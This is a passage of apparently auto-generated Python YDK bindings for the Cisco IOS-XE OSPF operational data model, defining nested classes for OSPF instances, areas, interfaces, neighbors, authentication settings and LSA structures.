ospfv2_lsa_type_unsupported_lsa_type = Enum.YLeaf(0, "ospfv2-lsa-type-unsupported-lsa-type") ospfv2_lsa_type_router = Enum.YLeaf(1, "ospfv2-lsa-type-router") ospfv2_lsa_type_network = Enum.YLeaf(2, "ospfv2-lsa-type-network") ospfv2_lsa_type_summary_net = Enum.YLeaf(3, "ospfv2-lsa-type-summary-net") ospfv2_lsa_type_summary_router = Enum.YLeaf(4, "ospfv2-lsa-type-summary-router") ospfv2_lsa_type_as_external = Enum.YLeaf(5, "ospfv2-lsa-type-as-external") ospfv2_lsa_type_nssa = Enum.YLeaf(6, "ospfv2-lsa-type-nssa") ospfv2_lsa_type_link_scope_opaque = Enum.YLeaf(7, "ospfv2-lsa-type-link-scope-opaque") ospfv2_lsa_type_area_scope_opaque = Enum.YLeaf(8, "ospfv2-lsa-type-area-scope-opaque") ospfv2_lsa_type_as_scope_opaque = Enum.YLeaf(9, "ospfv2-lsa-type-as-scope-opaque") class OspfOperData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData, self).__init__() self._top_entity = None self.yang_name = "ospf-oper-data" self.yang_parent_name = "Cisco-IOS-XE-ospf-oper" self.is_top_level_class = True self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("ospf-state", ("ospf_state", OspfOperData.OspfState)), ("ospfv2-instance", ("ospfv2_instance", OspfOperData.Ospfv2Instance))]) self._leafs = OrderedDict() self.ospf_state = None self._children_name_map["ospf_state"] = "ospf-state" self.ospfv2_instance = YList(self) self._segment_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData, [], name, value) class OspfState(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState, self).__init__() self.yang_name = "ospf-state" self.yang_parent_name = "ospf-oper-data" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("ospf-instance", ("ospf_instance", OspfOperData.OspfState.OspfInstance))]) self.is_presence_container = True self._leafs = OrderedDict([ ('op_mode', (YLeaf(YType.enumeration, 'op-mode'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfOperationMode', '')])), ]) self.op_mode = None self.ospf_instance = YList(self) self._segment_path = lambda: "ospf-state" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState, ['op_mode'], name, value) class OspfInstance(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance, self).__init__() self.yang_name = "ospf-instance" self.yang_parent_name = "ospf-state" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['af','router_id'] self._child_classes = OrderedDict([("ospf-area", ("ospf_area", OspfOperData.OspfState.OspfInstance.OspfArea)), ("link-scope-lsas", ("link_scope_lsas", OspfOperData.OspfState.OspfInstance.LinkScopeLsas)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.MultiTopology))]) self._leafs = OrderedDict([ ('af', (YLeaf(YType.enumeration, 'af'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'AddressFamily', '')])), ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])), ('process_id', (YLeaf(YType.uint16, 'process-id'), ['int'])), ]) self.af = None self.router_id = None self.process_id = None self.ospf_area = YList(self) self.link_scope_lsas = YList(self) self.multi_topology = YList(self) self._segment_path = lambda: "ospf-instance" + "[af='" + str(self.af) + "']" + "[router-id='" + str(self.router_id) + "']" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/ospf-state/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance, ['af', 'router_id', 'process_id'], name, value) class OspfArea(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea, self).__init__() self.yang_name = "ospf-area" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['area_id'] self._child_classes = OrderedDict([("ospf-interface", ("ospf_interface", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa))]) self._leafs = OrderedDict([ ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])), ]) self.area_id = None self.ospf_interface = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "ospf-area" + "[area-id='" + str(self.area_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea, ['area_id'], name, value) class OspfInterface(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, self).__init__() self.yang_name = "ospf-interface" self.yang_parent_name = "ospf-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([("multi-area", ("multi_area", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea)), ("static-neighbor", ("static_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor)), ("fast-reroute", ("fast_reroute", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute)), ("ttl-security", ("ttl_security", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity)), ("authentication", ("authentication", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication)), ("ospf-neighbor", ("ospf_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor)), ("intf-link-scope-lsas", ("intf_link_scope_lsas", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas)), ("intf-multi-topology", ("intf_multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology))]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])), ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])), ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])), ('node_flag', (YLeaf(YType.boolean, 'node-flag'), ['bool'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])), ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])), ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])), ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])), ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])), ('lls', (YLeaf(YType.boolean, 'lls'), ['bool'])), ('prefix_suppression', (YLeaf(YType.boolean, 'prefix-suppression'), ['bool'])), ('bfd', (YLeaf(YType.boolean, 'bfd'), ['bool'])), ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('state', (YLeaf(YType.str, 'state'), ['str'])), ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])), ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])), ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])), ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])), ('priority', (YLeaf(YType.uint8, 'priority'), ['int'])), ]) self.name = None self.network_type = None self.passive = None self.demand_circuit = None self.node_flag = None self.cost = None self.hello_interval = None self.dead_interval = None self.retransmit_interval = None self.transmit_delay = None self.mtu_ignore = None self.lls = None self.prefix_suppression = None self.bfd = None self.enable = None self.state = None self.hello_timer = None self.wait_timer = None self.dr = None self.bdr = None self.priority = None self.multi_area = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea() self.multi_area.parent = self self._children_name_map["multi_area"] = "multi-area" self.fast_reroute = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute() self.fast_reroute.parent = self self._children_name_map["fast_reroute"] = "fast-reroute" self.ttl_security = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity() self.ttl_security.parent = self self._children_name_map["ttl_security"] = "ttl-security" self.authentication = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication() self.authentication.parent = self self._children_name_map["authentication"] = "authentication" self.static_neighbor = YList(self) self.ospf_neighbor = YList(self) self.intf_link_scope_lsas = YList(self) self.intf_multi_topology = YList(self) self._segment_path = lambda: "ospf-interface" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, ['name', 'network_type', 'passive', 'demand_circuit', 'node_flag', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'mtu_ignore', 'lls', 'prefix_suppression', 'bfd', 'enable', 'state', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'priority'], name, value) class MultiArea(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, self).__init__() self.yang_name = "multi-area" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('multi_area_id', (YLeaf(YType.uint32, 'multi-area-id'), ['int'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ]) self.multi_area_id = None self.cost = None self._segment_path = lambda: "multi-area" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, ['multi_area_id', 'cost'], name, value) class StaticNeighbor(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, self).__init__() self.yang_name = "static-neighbor" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['address'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('poll_interval', (YLeaf(YType.uint16, 'poll-interval'), ['int'])), ]) self.address = None self.cost = None self.poll_interval = None self._segment_path = lambda: "static-neighbor" + "[address='" + str(self.address) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, ['address', 'cost', 'poll_interval'], name, value) class FastReroute(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, self).__init__() self.yang_name = "fast-reroute" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('candidate_disabled', (YLeaf(YType.boolean, 'candidate-disabled'), ['bool'])), ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])), ('remote_lfa_enabled', (YLeaf(YType.boolean, 'remote-lfa-enabled'), ['bool'])), ]) self.candidate_disabled = None self.enabled = None self.remote_lfa_enabled = None self._segment_path = lambda: "fast-reroute" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, ['candidate_disabled', 'enabled', 'remote_lfa_enabled'], name, value) class TtlSecurity(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, self).__init__() self.yang_name = "ttl-security" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])), ('hops', (YLeaf(YType.uint8, 'hops'), ['int'])), ]) self.enabled = None self.hops = None self._segment_path = lambda: "ttl-security" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, ['enabled', 'hops'], name, value) class Authentication(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, self).__init__() self.yang_name = "authentication" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("crypto-algorithm-val", ("crypto_algorithm_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal))]) self._leafs = OrderedDict([ ('sa', (YLeaf(YType.str, 'sa'), ['str'])), ('key_chain', (YLeaf(YType.str, 'key-chain'), ['str'])), ('key_string', (YLeaf(YType.str, 'key-string'), ['str'])), ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])), ]) self.sa = None self.key_chain = None self.key_string = None self.no_auth = None self.crypto_algorithm_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal() self.crypto_algorithm_val.parent = self self._children_name_map["crypto_algorithm_val"] = "crypto-algorithm-val" self._segment_path = lambda: "authentication" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, ['sa', 'key_chain', 'key_string', 'no_auth'], name, value) class CryptoAlgorithmVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, self).__init__() self.yang_name = "crypto-algorithm-val" self.yang_parent_name = "authentication" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('hmac_sha1_12', (YLeaf(YType.empty, 'hmac-sha1-12'), ['Empty'])), ('hmac_sha1_20', (YLeaf(YType.empty, 'hmac-sha1-20'), ['Empty'])), ('md5', (YLeaf(YType.empty, 'md5'), ['Empty'])), ('sha_1', (YLeaf(YType.empty, 'sha-1'), ['Empty'])), ('hmac_sha_1', (YLeaf(YType.empty, 'hmac-sha-1'), ['Empty'])), ('hmac_sha_256', (YLeaf(YType.empty, 'hmac-sha-256'), ['Empty'])), ('hmac_sha_384', (YLeaf(YType.empty, 'hmac-sha-384'), ['Empty'])), ('hmac_sha_512', (YLeaf(YType.empty, 'hmac-sha-512'), ['Empty'])), ]) self.hmac_sha1_12 = None self.hmac_sha1_20 = None self.md5 = None self.sha_1 = None self.hmac_sha_1 = None self.hmac_sha_256 = None self.hmac_sha_384 = None self.hmac_sha_512 = None self._segment_path = lambda: "crypto-algorithm-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, ['hmac_sha1_12', 'hmac_sha1_20', 'md5', 'sha_1', 'hmac_sha_1', 'hmac_sha_256', 'hmac_sha_384', 'hmac_sha_512'], name, value) class OspfNeighbor(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, self).__init__() self.yang_name = "ospf-neighbor" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['neighbor_id'] self._child_classes = OrderedDict([("stats", ("stats", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats))]) self._leafs = OrderedDict([ ('neighbor_id', (YLeaf(YType.str, 'neighbor-id'), ['str','str'])), ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])), ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])), ]) self.neighbor_id = None self.address = None self.dr = None self.bdr = None self.state = None self.stats = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats() self.stats.parent = self self._children_name_map["stats"] = "stats" self._segment_path = lambda: "ospf-neighbor" + "[neighbor-id='" + str(self.neighbor_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, ['neighbor_id', 'address', 'dr', 'bdr', 'state'], name, value) class Stats(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, self).__init__() self.yang_name = "stats" self.yang_parent_name = "ospf-neighbor" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('nbr_event_count', (YLeaf(YType.uint32, 'nbr-event-count'), ['int'])), ('nbr_retrans_qlen', (YLeaf(YType.uint32, 'nbr-retrans-qlen'), ['int'])), ]) self.nbr_event_count = None self.nbr_retrans_qlen = None self._segment_path = lambda: "stats" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, ['nbr_event_count', 'nbr_retrans_qlen'], name, value) class IntfLinkScopeLsas(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, self).__init__() self.yang_name = "intf-link-scope-lsas" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.link_scope_lsa = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "intf-link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, ['lsa_type'], name, value) class LinkScopeLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, self).__init__() self.yang_name = "link-scope-lsa" self.yang_parent_name = "intf-link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_id','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ('version', (YLeaf(YType.uint32, 'version'), ['int'])), ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])), ]) self.lsa_id = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.version = None self.router_address = None self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal() self.ospfv3_lsa_val.parent = self self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val" self.tlv = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv() self.tlv.parent = self self._children_name_map["tlv"] = "tlv" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv2_unknown_tlv = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix_list = YList(self) self.ospfv3_ia_prefix = YList(self) self.multi_topology = YList(self) self.unknown_sub_tlv = YList(self) self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value) class Ospfv2Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", 